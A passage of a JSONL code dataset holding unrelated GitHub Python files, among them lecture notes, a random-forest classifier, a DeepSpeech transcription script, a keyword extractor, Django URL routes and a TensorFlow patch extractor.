names.append(new_name)\nprint(names)\n\n# Dictionaries\nl = [3, 4]\nl[0]\n\n# dct = {}\n# dct = {\n# key: value\n# }\ndct = {\"bedroom\": \"beautiful room\", 3: \"hi there\"}\nprint(dct[\"bedroom\"])\nprint(dct[3])\n\nfor key, value in dct.items():\n print(key, \":\", value)\n\n#####\n# dictionary_name = {\n# key1: value1,\n# key2: value2,\n# ...\n# }\n\nattributes = {\"bedir\": \"is tall\", \"tarik\": \"has dark hair\", \"huze\": \"wears glasses\"}\n\nname = \"bedir\"\nprint(f\"{name} {attributes[name]}\")\n\nfor key, value in attributes.items():\n print(f\"{key} {value}\")\n\n# Exercise:\n# 0:\n# Create a dictionary to hold information about pets. 
Each key is an animal's name, and each value is the kind of animal.\n# For example, 'ziggy': 'canary'\n# Put at least 3 key-value pairs in your dictionary.\n# Use a for loop to print out a series of statements such as \"Willie is a dog.\"\nanimals = {\"hannah\": \"dog\", \"boncuk\": \"cat\", \"foggy\": \"goat\"}\nfor key, value in animals.items():\n print(f\"{key.title()} is a {value}.\")\n","repo_name":"Python-Class-bdr/Lectures","sub_path":"lecture_notes/lecture_5.py","file_name":"lecture_5.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25300142182","text":"\r\nimport pickle\r\n\r\nimport numpy as np # Fundamental package for linear algebra and multidimensional arrays\r\nimport pandas as pd # Data analysis and manipultion tool\r\n\r\n# In read_csv() function, we have passed the location to where the files are located in the dphi official github page.\r\ntrain_data = pd.read_csv(\"https://raw.githubusercontent.com/dphi-official/Datasets/master/hippocorpus/train_set_label.csv\" )\r\n\r\nX = train_data.drop(['recAgnPairId','recImgPairId','similarityReason','story','WorkerId','AssignmentId','summary',\r\n 'annotatorRace','mainEvent','mostSurprising','memType'],axis = 1)\r\ny = train_data['memType'] # Output/Dependent variable\r\n\r\nGender = X.annotatorGender\r\nGender_final = []\r\nfor item in Gender:\r\n if item == 'Man' or item == 'man' or item == 'MAN':\r\n Gender_final.append(0)\r\n elif item == 'woman' or item == 'WOMAN' or item == 'Woman':\r\n Gender_final.append(1)\r\n else:\r\n Gender_final.append(2)\r\n\r\nX.drop('annotatorGender',axis = 1, inplace = True)\r\nX['Gender'] = Gender_final\r\n\r\ndistracted_text = X.distracted\r\n\r\ndistarcted_final = []\r\nfor item in distracted_text:\r\n if item == 'one':\r\n distarcted_final.append(1)\r\n elif item == '2.0':\r\n distarcted_final.append(2)\r\n elif item == '3.0':\r\n distarcted_final.append(3)\r\n elif item == '4.0':\r\n distarcted_final.append(4) \r\n else:\r\n distarcted_final.append(5)\r\n\r\nX.drop('distracted',axis = 1, inplace = True)\r\nX['distracted_num'] = distarcted_final\r\n\r\ndraining_text = X.draining\r\n\r\ndraining_final = []\r\nfor item in draining_text:\r\n if item == 'one':\r\n draining_final.append(1)\r\n elif item == '2.0':\r\n draining_final.append(2)\r\n elif item == '3.0':\r\n draining_final.append(3)\r\n elif item == '4.0':\r\n draining_final.append(4) \r\n else:\r\n draining_final.append(5)\r\n\r\nX.drop('draining',axis = 1, inplace = True)\r\nX['draining'] = draining_final\r\n\r\ny_enc = []\r\nfor item in y:\r\n if item == 'recalled':\r\n y_enc.append(0)\r\n elif item == 'imagined':\r\n y_enc.append(1)\r\n else:\r\n y_enc.append(2)\r\ny_enc \r\n#y = np.array(y_enc)\r\n\r\n# import train_test_split\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nX_train, X_val, y_train, y_val = train_test_split(X,y,test_size=0.3, random_state = 42)\r\n\r\nX_train.annotatorAge.fillna(X_train.annotatorAge.mean(), inplace=True)\r\nX_train.importance.fillna(X_train.importance.mean(), inplace=True)\r\nX_train.frequency.fillna(X_train.frequency.mean(), inplace=True)\r\nX_train.similarity.fillna(X_train.similarity.mean(), inplace=True)\r\n\r\nX_val.annotatorAge.fillna(X_val.annotatorAge.mean(), inplace=True)\r\nX_val.importance.fillna(X_val.importance.mean(), inplace=True)\r\nX_val.frequency.fillna(X_val.frequency.mean(), inplace=True)\r\nX_val.similarity.fillna(X_val.similarity.mean(), 
inplace=True)\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nss = StandardScaler()\r\nX_train = ss.fit_transform(X_train)\r\nX_val = ss.fit_transform(X_val)\r\n\r\nparams = {\"max_depth\": [25],\r\n \"min_samples_split\": [3],\r\n \"min_samples_leaf\": [1,2,3],\r\n \"bootstrap\": [True],\r\n \"n_estimators\": [125],\r\n \"n_jobs\": [-1],\r\n \"verbose\": [2],\r\n \"criterion\": [\"entropy\"]\r\n }\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\nrfc1 = RandomForestClassifier()\r\nclf = GridSearchCV(rfc1, params,cv = 4)\r\nclf.fit(X_train,y_train)\r\n\r\npred_clf = clf.predict(X_val)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nresult = clf.score(X_val, y_val)\r\nprint('The Score is;', result)\r\n\r\nprint('F1 Score for random forest classifier is: ', f1_score(y_val, pred_clf, average = 'weighted'))\r\n\r\n#save the model \r\nfilename = 'model.pkl'\r\npickle.dump(clf, open(filename, 'wb'))\r\n","repo_name":"TanmayR07/Human-Cognitive-Predictor","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21964383544","text":"import pygame\n\npygame.init()\n\nWIDTH = 600\nHEIGHT = 800\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"События от клавиатуры\")\n\nWHITE = (255, 255, 255)\nBLUE = (0, 0, 255)\n\nFPS = 60\nclock = pygame.time.Clock()\n\nx = WIDTH//2\ny = HEIGHT//2\nspeed = 5\n\n\nwhile 1:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n x -= speed\n elif keys[pygame.K_RIGHT]:\n x += speed\n\n screen.fill(WHITE)\n pygame.draw.rect(screen, BLUE, (x, y, 10, 20))\n pygame.display.update()\n\n clock.tick(FPS)\n","repo_name":"KuBaN658/infa_2022_KuBaN658","sub_path":"lab3/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3113495778","text":"#!/usr/bin/env python3\n\"\"\"\nThis script will use deepspeech and convert the audio file to text\nauthor: sachin2001g@gmail.com\n\"\"\"\nimport argparse\nimport numpy as np\nimport shlex\nimport subprocess\nimport sys\nimport wave\nimport json\nimport time\nimport deepspeech\n\nfrom timeit import default_timer as timer\n\ntry:\n from shhlex import quote\nexcept ImportError:\n from pipes import quote\n\nMODEL_PATH = \"D:\\InOut\\Deepspeech\\deepspeech-0.8.2-models\\deepspeech-0.8.1-models.pbmm\"\nSCORER_PATH = \"D:\\InOut\\Deepspeech\\deepspeech-0.8.2-models\\deepspeech-0.8.1-models.scorer\"\n\ndef convert_samplerate(audio_path, desired_sample_rate):\n sox_cmd = 'sox {} --type raw --bits 16 --channels 1 --rate {} --encoding signed-integer --endian little --compression 0.0 --no-dither - '.format(quote(audio_path), desired_sample_rate)\n try:\n output = subprocess.check_output(shlex.split(sox_cmd), stderr=subprocess.PIPE)\n except subprocess.CalledProcessError as e:\n raise RuntimeError('SoX returned non-zero status: {}'.format(e.stderr))\n except OSError as e:\n raise OSError(e.errno, 'SoX not found, use {}hz files or install it: {}'.format(desired_sample_rate, e.strerror))\n\n return desired_sample_rate, np.frombuffer(output, np.int16)\n\n\ndef main():\n \n parser = argparse.ArgumentParser(description='Speech to text using deepspeech')\n parser.add_argument('--audio', 
required=True, help='Path to the audio file to run (WAV format)')\n    args = parser.parse_args()\n    audio_path = args.audio\n    #initialise model\n    model = deepspeech.Model(MODEL_PATH)\n    #configure scorer\n    model.enableExternalScorer(SCORER_PATH)\n    fin = wave.open(audio_path, 'rb')\n    fs_orig = fin.getframerate()\n    desired_sample_rate = model.sampleRate()\n    fs_new, audio = convert_samplerate(audio_path, desired_sample_rate)\n    audio_length = fin.getnframes() * (1/fs_orig)\n    print(\"audio-length {}\".format(str(audio_length)))\n    output_text = model.stt(audio)\n    print(output_text)\n    file_name = \"{}_text_{}.txt\".format(audio_path.split(\"/\")[-1],str(time.time()))\n    output_text_file = open(file_name, \"a\")\n    output_text_file.write(output_text)\n    output_text_file.close()\n\n\nif __name__ == '__main__':\n    main()","repo_name":"sachinbhat2001/speech-to-text-using-deepspeech","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"22689733973","text":"# To replace foldSelectSPSs in openbiomind!\n\n# SNP Binarization - Not purely mathematical so read this!!\n# In binarizing SNPs we use the fact that most SNPs only have two significant versions, denoted 1 or 2 in the formats. During binarization we define this as ABSENCE(0) OR PRESENCE(1) OF THE WILD TYPE VARIANT (2).\n# The assumption is that recessive alleles are completely silenced by the presence of the dominant version. (That's a BIG assumption!!!)\n\nimport sys\n\nFile = sys.argv[1]\n#File = '../base/well.tab'\nOFile = './wellT.tab'\n\nFile = [x.rstrip().split('\\t') for x in open(File).readlines()]\n\nout = [File[0]]\n\ntargetCategory = sys.argv[2]\t# assumed: the target category label (e.g. 'case') is passed as the second argument\ntargetLine = ['']\nfor x in File[1]:\n\tif x == targetCategory:\n\t\ttargetLine.append('1')\n\telse:\n\t\ttargetLine.append('0')\n\nout.append(targetLine)\n\ndef mapFunc(List):\n\tout = [List[0]]\n\tfor x in List[1:]:\n\t\tif '2' in x:\n\t\t\tout.append('1')\n\t\telse:\n\t\t\tout.append('0')\n\treturn out\n\nfor x in File[2:]:\n\tout.append(mapFunc(x))\n\nOFILE = open(OFile,'w')\nfor x in out:\n\tOFILE.write('\\t'.join(x)+'\\n')\n\nOFILE.close()\n","repo_name":"kurekaoru/biomind_gaga","sub_path":"pyutils/binarizeSNP.py","file_name":"binarizeSNP.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"23950477788","text":"class Solution:\r\n    def reconstructQueue(self, people: list) -> list:\r\n        # sort in ascending order of number of people in front of each person\r\n        people.sort(key=lambda x: x[1])\r\n        # sort in descending order of height\r\n        people.sort(reverse=True, key=lambda x: x[0])\r\n        ans = []\r\n        # rearrange people according to number of people in front of each person\r\n        for p in people:\r\n            ans.insert(p[1], p)\r\n        return ans\r\n\r\n\r\npeople = [[7, 0], [4, 4], [7, 1], [5, 0], [6, 1], [5, 2]]\r\nprint(f\"Input: {people}\")\r\nprint(f\"Output: {Solution().reconstructQueue(people)}\")\r\n","repo_name":"rajitbanerjee/leetcode","sub_path":"src/queueReconstruct/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"36493253771","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\n### Get arguments and init ###\nif len(sys.argv) < 3:\n\tprint(\"Please provide a file and a column\")\n\tsys.exit()\n\nfilename 
= str(sys.argv[1])\ncolumn = int(sys.argv[2])\n\n### Read CSV file ###\nfilename = sys.argv[1]\ncsv_file = pd.read_csv(filename)\n\n### Extract column ###\nresult = csv_file.values[: , column]\ncname = csv_file.columns[column]\n\n### Normalize ###\nresult_mean = np.mean(result)\nresult_std = np.std(result)\n\nprint(\"Mean:\", result_mean)\nprint(\"Std:\", result_std)\n\nresult_max = np.max(result)\nresult_min = np.min(result)\n\nprint(\"Max:\", result_max)\nprint(\"Min:\", result_min)\n\nresult = (result - result_mean) / result_std\n#result = (result - result_min) / (result_max - result_min)\n\nif min(result) < 0:\n\tprint(\"Warning! You are using a dataset with negative values!\")\n\n### Save to csv ###\ndataframe = pd.DataFrame(result)\n\ncsv_name = filename.split('.')[0] + \"_\" + cname + \".csv\"\n\ndataframe.to_csv(csv_name, mode=\"w\", index=False, header=False)\n","repo_name":"Sphinx-Galaxy/master-thesis","sub_path":"Scripts/csv_extract.py","file_name":"csv_extract.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5479017070","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Sponge_sy\"\n# Date: 2020/2/21\n\nfrom embeddings import sent_emb_sif, word_emb_elmo\nfrom model.method import SIFRank, SIFRank_plus\nimport thulac\nimport time\nimport os\nimport csv\nfrom model import util\nimport logging\nimport multiprocessing as mp\nfrom multiprocessing import Process,Lock,Queue,Value\nlogger = util.get_logger(__name__, debug=1)\n\n#user_dict_file=r'./auxiliary_data/keyword_vocab_final'\n##user_dict_file=r'./auxiliary_data/user_dict.txt'\n#model_file = r'./auxiliary_data/zhs.model/'\n#ELMO = word_emb_elmo.WordEmbeddings(model_file, cuda_device=5)\n#SIF = sent_emb_sif.SentEmbeddings(ELMO, lamda=1.0)\n#zh_model = thulac.thulac(model_path=r'./auxiliary_data/thulac.models/',user_dict=user_dict_file)\n#elmo_layers_weight = [0.0, 1.0, 0.0]\n\ndef load_cut_dict(user_dict_file):\n trie_dict = dict()\n with open(user_dict_file, \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n cut_parts = line.strip().split(' ')\n num = len(cut_parts)\n tmp_dict = trie_dict\n for i in range(num):\n p = cut_parts[i]\n if p in tmp_dict:\n tmp_dict = tmp_dict[p]\n else:\n tmp_dict[p] = dict()\n tmp_dict = tmp_dict[p]\n if i == num - 1:\n tmp_dict.update({\"is_leaf\":1})\n return trie_dict\n\n\ndef load_user_dict(user_dict_file):\n user_dict = set()\n with open(user_dict_file, \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n word = line.strip().split('\\t')[0]\n word = word.lower()\n user_dict.add(word)\n return user_dict\n\n\ndef load_kw_info(kw_info_file, encoding=\"utf-8\"):\n kw_info = dict()\n with open(kw_info_file, \"r\", encoding=encoding) as fp:\n for line in fp:\n parts = line.strip().split('\\t')\n if len(parts) != 4:\n continue\n kw, qv, df, idf = parts[0], int(parts[1]), int(parts[2]), float(parts[3])\n kw_info[kw] = (idf,df,qv)\n return kw_info\n\n\ndef extract_keyword(text, SIF, zh_model, elmo_layers_weight, plus=False, topk=15, kwdict=None, kw_info=None, cut_dict=False, seg_only=True):\n if plus == False:\n keyphrases = SIFRank(text, SIF, zh_model, N=topk,elmo_layers_weight=elmo_layers_weight, kwdict=kwdict, kw_info=kw_info, cut_dict=cut_dict, seg_only=True)\n else:\n keyphrases = SIFRank_plus(text, SIF, zh_model, N=topk, elmo_layers_weight=elmo_layers_weight, kwdict=kwdict, kw_info=kw_info, cut_dict=cut_dict, seg_only=True)\n return keyphrases\n\ndef 
load_articles(input_file):\n docids = []\n texts = []\n with open(input_file, \"r\", encoding=\"utf-8\") as fp:\n for idx,line in enumerate(fp):\n parts = line.strip().split('\\t')\n if len(parts) < 3:\n print(\"[parts error]less 3\")\n continue\n docid = parts[0]\n title = parts[1]\n content = parts[2]\n text = title + \"\\t\" + content\n docids.append(docid)\n texts.append(text)\n if idx < 5:\n print(\"[check_data]docid:%s, title:%s, content:%s\" %(docid, title, content))\n return docids, texts\n\n\ndef load_tencent_articles(input_file):\n docids = []\n texts = []\n with open(input_file, \"r\", encoding=\"utf-8\") as fp:\n for idx,line in enumerate(fp):\n parts = line.strip().split('\\t')\n if len(parts) < 5:\n continue\n docid = parts[0]\n title = parts[3]\n content = parts[4]\n text = title + \"\\t\" + content\n docids.append(docid)\n texts.append(text)\n if idx < 5:\n print(\"[check_data]docid:%s, title:%s, content:%s\" %(docid, title, content))\n return docids, texts\n\n\nclass ExtractWorker(Process):\n def __init__(self, recv_queue, push_queue, stop_sign, worker_id, gpu_id=0, plus=True, seg_only=True, elmo_layers_weight=[0.5, 1.0, 0.5], cut_dict=False, logger=logging.getLogger()):\n super(ExtractWorker, self).__init__()\n self.user_dict_file=r'./auxiliary_data/keyword_vocab_final'\n self.cut_dict_file=r'/search/odin/liruihong/keyword-project/data/keywords_vocab/keyword_vocab_final_cut'\n self.kw_info_file=r'/search/odin/liruihong/keyword-project/config_data/ret_item_info'\n self.model_file = r'./auxiliary_data/zhs.model/'\n self.seg_only = seg_only\n self.gpu_id = gpu_id\n if cut_dict == False:\n self.user_dict = load_user_dict(self.user_dict_file)\n else:\n self.user_dict = load_cut_dict(self.user_dict_file)\n self.cut_dict = cut_dict\n self.kw_info = load_kw_info(self.kw_info_file, encoding=\"gbk\")\n self.elmo_layers_weight = elmo_layers_weight\n self.recv_queue = recv_queue\n self.push_queue = push_queue\n self.stop_sign = stop_sign\n self.plus = plus\n self.worker_id = worker_id\n self.logger = logger\n\n def run(self):\n self.ELMO = word_emb_elmo.WordEmbeddings(self.model_file, cuda_device=self.gpu_id)\n self.SIF = sent_emb_sif.SentEmbeddings(self.ELMO, lamda=1.0)\n if self.cut_dict == True:\n self.zh_model = thulac.thulac(model_path=r'./auxiliary_data/thulac.models/', seg_only=self.seg_only)\n else:\n self.zh_model = thulac.thulac(model_path=r'./auxiliary_data/thulac.models/',user_dict=self.user_dict_file, seg_only=self.seg_only)\n while self.stop_sign.value == 0:\n if self.recv_queue.empty() == False:\n try:\n data = self.recv_queue.get(True, 1)\n except Exception as e:\n continue\n docid = data[0]\n text = data[1]\n if len(text) > 4000:\n text = text[0:4000]\n # [title, content] = text.split('\\t')\n self.logger.info(\"worker_process[%d] %s, len:%d\" %(self.worker_id, docid, len(text)))\n keywords = extract_keyword(text, self.SIF, self.zh_model, self.elmo_layers_weight, plus=self.plus,\n topk=20, kwdict=self.user_dict, kw_info=self.kw_info, cut_dict=self.cut_dict, seg_only=self.seg_only)\n\n self.logger.info(\"worker_succ[%d] %s\" %(self.worker_id, docid))\n self.logger.info(\"worker_succ[%d] %s %s\" %(self.worker_id, docid, keywords))\n #self.push_queue.put([docid, title_kw, content_kw])\n self.push_queue.put([docid, keywords])\n\n self.logger.info(\"stop worker[%d]\" %(self.worker_id))\n\n\ndef multiprocess_extract_keywords(input_file, output_file, process_num=1, gpu_ids=[0], plus=True, elmo_layers_weight=[1.0, 0.0, 0.0], cut_dict=False, seg_only=True):\n input_que = 
Queue()\n output_que = Queue()\n #docids, texts = load_tencent_articles(input_file)\n docids, texts = load_articles(input_file)\n total_num = len(docids)\n real_num = 0\n for i in range(total_num):\n if i >= 40:\n break\n real_num += 1\n docid = docids[i]\n text = texts[i]\n input_que.put([docid, text])\n\n stop_sign = Value('i', 0) # 进程间共享停止变量\n worker_list = []\n for i in range(process_num):\n gpu_idx = i % (len(gpu_ids))\n logger.info(\"create worker[%d] on gpu_%d\" %(i, gpu_ids[gpu_idx]))\n worker = ExtractWorker(input_que, output_que, stop_sign, worker_id=i, gpu_id=gpu_ids[gpu_idx], plus=plus, seg_only=seg_only,\n elmo_layers_weight=elmo_layers_weight, cut_dict=cut_dict, logger=logger)\n worker_list.append(worker)\n\n\n for i,worker in enumerate(worker_list):\n worker.start()\n logger.info(\"start worker[%d]\" %(i))\n\n st = time.time()\n res_num = 0\n wfp = open(output_file, \"w\", encoding=\"utf-8\")\n speed_st = time.time()\n speed_count = 0\n while True:\n if res_num == real_num:\n break\n if output_que.empty() == False:\n try:\n data = output_que.get(True, 1)\n except Exception as e:\n logger.error(\"multiprocess_extract_keywords output_que.get Exception:%s\" % (e))\n continue\n docid = data[0]\n keywords = data[1]\n #title_keywords = data[1]\n #content_keywords = data[2]\n #writer_title = \" \".join([\"%s:%s\" % (kw, \",\".join([\"%f\" %(x) for x in score])) for kw,score in title_keywords])\n #writer_content = \" \".join([\"%s:%s\" % (kw, \",\".join([\"%f\" %(x) for x in score])) for kw,score in content_keywords])\n writer_keywords = \"\\t\".join([\"%s:%s\" % (kw_score[0], \",\".join([\"%f\" %(x) for x in kw_score[1:]])) for kw_score in keywords])\n #writer_line = \" \".join([\"%s:%f\" % (k,s) for k,s in keywords])\n #wfp.write(\"%s\\t%s\\t%s\\n\" % (docid, writer_title, writer_content))\n logger.info(\"%s\\t%s\\n\" % (docid, writer_keywords))\n wfp.write(\"%s\\t%s\\n\" % (docid, writer_keywords))\n res_num += 1\n logger.info(\"[succ]%s\" %(docid))\n speed_count += 1\n speed_ed = time.time()\n if int(speed_ed - speed_st) >= 60:\n #speed = speed_count/60\n logger.info(\"[check_speed]%d/minute\" %(speed_count))\n speed_st = time.time()\n speed_count = 0\n\n wfp.close()\n ed = time.time()\n cost = int((ed - st)/60)\n logger.info(\"all data cost:%d minutes %d seconds\" %(cost, int(ed-st)))\n stop_sign.value = 1\n for worker in worker_list:\n worker.join()\n logger.info(\"finish all work\")\n\n\nif __name__ == \"__main__\":\n # input_file = \"/search/odin/liruihong/keyword-project/input_data/new_articles_7d.tsv\"\n # output_file = \"/search/odin/liruihong/keyword-project/output_data/new_articles_7d_kw.tsv\"\n input_file = \"/search/odin/liruihong/keyword-project/input_data/test_articles.tsv\"\n output_file = \"/search/odin/liruihong/keyword-project/output_data/text_articles_kw_siftr\"\n multiprocess_extract_keywords(input_file, output_file, process_num=4, gpu_ids=[3,4,5,6], plus=True, elmo_layers_weight=[1.0, 0.0, 0.0], cut_dict=False, seg_only=True)\n\n","repo_name":"alwayschasing/KWSIFRank","sub_path":"multiprocess_extract.py","file_name":"multiprocess_extract.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11791189","text":"import asyncio\nimport logging\nimport platform\nimport sys\nfrom asyncio import sleep\n\nimport aiohttp\nimport coloredlogs\n\nfrom app.URLS import URL_TASKS, URL_GET_JWT\nfrom app.headers import base_headers, api_headers\nfrom app.models_pdc import 
Task\nfrom app.request_shecker import request_dispatcher, send_answers\nfrom app.settings import settings\n\n\nasync def get_root_jwt():\n async with aiohttp.ClientSession() as session:\n json = {\n \"username\": settings().API_LOGIN,\n \"password\": settings().API_PASSWORD,\n }\n async with session.post(URL_GET_JWT, data=json) as resp:\n if resp.status != 200:\n logging.info(\"JWT token not received!!!\")\n sys.exit(-1)\n data = await resp.json()\n logging.info(\"Root jwt successfully received\")\n return f\"Bearer {data['access_token']}\"\n\n\nasync def get_tasks() -> list[Task]:\n tasks = []\n async with aiohttp.ClientSession(headers=api_headers) as session:\n async with session.get(URL_TASKS) as resp:\n data = await resp.json()\n for task in data:\n tasks.append(Task(**task))\n return tasks\n\n\nasync def watcher():\n while True:\n logging.info(\"Watcher iteration\")\n tasks = await get_tasks()\n answers = await request_dispatcher(tasks)\n logging.info(\"Responses received, sending... \")\n await send_answers(answers)\n logging.info(\"Sending completed\")\n await sleep(settings().CHECK_TIMEOUT)\n\n\nasync def main():\n coloredlogs.install(level=logging.INFO)\n logging.info(\"Startup\")\n root_jwt = await get_root_jwt()\n api_headers[\"Authorization\"] = root_jwt\n await watcher()\n\n\nif __name__ == \"__main__\":\n try:\n if platform.system() == 'Windows':\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n asyncio.run(main())\n except (KeyboardInterrupt, SystemExit):\n logging.error(\"Checker stopped!\")\n","repo_name":"CupSoft/webeye","sub_path":"checker/app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"18466498618","text":"import six\nfrom stolos import exceptions\n\nfrom . 
import shared\n\n\ndef validate_state(\n pending, completed, failed, skipped, all=False, multi=False):\n \"\"\"Helper function to that raises UserWarning if user's request defines\n an invalid combination of job states\n \"\"\"\n cnt = pending + completed + failed + skipped\n if multi:\n if cnt < 1 and not all:\n raise UserWarning(\n \"you must request at least one of these states:\"\n \" pending, completed, failed, skipped\")\n else:\n if cnt != 1:\n raise UserWarning(\n \"you must request exactly one of these states:\"\n \" pending, completed, failed, skipped\")\n rv = []\n if all or pending:\n rv.append(shared.PENDING)\n if all or completed:\n rv.append(shared.COMPLETED)\n if all or failed:\n rv.append(shared.FAILED)\n if all or skipped:\n rv.append(shared.SKIPPED)\n if multi:\n return rv\n else:\n return rv[0]\n\n\ndef check_state(app_name, job_id, raise_if_not_exists=False,\n pending=False, completed=False, failed=False, skipped=False,\n all=False, _get=False):\n \"\"\"Determine whether a specific job is in one or more specific state(s)\n\n If job_id is a string, return a single value.\n If multiple job_ids are given, return a list of values\n\n `app_name` is a task identifier\n `job_id` (str or list of str) is a subtask identifier or a list of them\n `all` (bool) if True, return True if the job_id is in a recognizable state\n `_get` (bool) if True, just return the string value of the state and\n ignore the (pending, completed, xor failed) choice\n \"\"\"\n qbcli = shared.get_qbclient()\n if isinstance(job_id, six.string_types):\n job_ids = [job_id]\n rvaslist = False\n else:\n job_ids = job_id\n rvaslist = True\n\n rv = []\n for job_id in job_ids:\n job_path = shared.get_job_path(app_name, job_id)\n try:\n gotstate = qbcli.get(job_path)\n except exceptions.NoNodeError:\n if raise_if_not_exists:\n raise\n else:\n rv.append(False)\n continue\n if _get:\n rv.append(gotstate)\n continue\n else:\n accepted_states = validate_state(\n pending, completed, failed, skipped, all=all, multi=True)\n rv.append(gotstate in accepted_states)\n continue\n if rvaslist:\n return rv\n else:\n return rv[0]\n","repo_name":"sailthru/stolos","sub_path":"stolos/queue_backend/read_job_state.py","file_name":"read_job_state.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"40"} +{"seq_id":"30864864484","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'magasin'\n\nurlpatterns = [\n path('dashboard', views.dashboard, name='dashboard'), # dashboard\n path('magasin', views.article_list, name='article_list'), # list of all articles\n path('magasin//', views.article_list, name='article_list_by_category'), # list of articles by category\n path('magasin/stock_alarm/', views.article_list, name='stock_alarm'), # stock alarm\n path('magasin/art_sans_prix/', views.article_list, name='art_sans_prix'), # Qte Sans prix\n\n path('magasin///', views.article_detail, name='article_detail'), # article details\n\n # Django-bootstrap-modal-forms URLS\n path('read-article//', views.ReadArticle.as_view(), name='read_article'), # article detail boots modal\n path('create-category/', views.CreateCategoryView.as_view(), name='create_category'), # create category\n path('create-article/', views.CreateArticleView.as_view(), name='create_article'), # create article\n path('update-article//', views.UpdateArticleView.as_view(), name='update_article'), # update article\n path('delete-article//', views.DeleteArticleView.as_view(), name='delete_article'), # delete article\n\n # Django-bootstrap-modal-forms with custom view\n path('entree-article//', views.entree_article_view, name='entree'), # new entry\n path('sortie-article//', views.sortie_article_view, name='sortie'), # new sortie\n\n # History\n path('magasin/history', views.magasin_log, name='magasin_log'), # article history\n path('magasin/history//', views.magasin_log, name='magasin_log_article'), # article history\n\n # Movement\n path('magasin/movement', views.movement, name='movement'), # All movement\n path('magasin/movement//', views.movement, name='movement_article'), # Movement by article.\n path('magasin/movement/etats', views.etats, name='etats'), # etats journalier, mensuel\n path('delete-movement//', views.DeleteMovementView.as_view(), name='delete_movement'), # delete movement\n\n # this url is a django-bootstrap-modal with custom view\n path('magasin/total_article', views.total_articles, name='total_articles'),\n\n # commands urls\n path('magasin/commands', views.manage_command, name='manage_command'), # all commands\n path('magasin/commands/', views.manage_command, name='manage_command'), # Active Command\n path('create-command/', views.CreateCommandView.as_view(), name='create_command'), # create command\n path('read-command/', views.ReadCommand.as_view(), name='read_command'), # Commande Details\n\n # Gestion Stocks\n # path('magasin/gestion_stocks', views.gestion_stocks, name='gestion_stocks'), # all movement\n]\n","repo_name":"bdabve/inventory","sub_path":"magasin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27174450865","text":"from image_utils import *\nimport os\nimport tensorflow as tf\nfrom numpy import newaxis\n\nWIDTH=128\nSTRIDE=128\n\ndef extract_patches(sess,data,width,stride):\n '''\n Extract patches from images \n :data input image \n :width dimensiton of the patch\n :stride stride of patch selection on the image\n '''\n print('Patch extraction with stride=%d and width=%d begins'%(stride,width) )\n data_pl=tf.placeholder(tf.float64, [data.shape[0],data.shape[1],data.shape[2],data.shape[3]], name='data_placeholder')\n data_o=tf.extract_image_patches(images=data_pl,ksizes=[1,width,width,1],strides=[1,stride,stride,1],rates=[1,1,1,1],padding='VALID')\n print('Patch extraction done')\n size_tot=data_o.get_shape().as_list()\n 
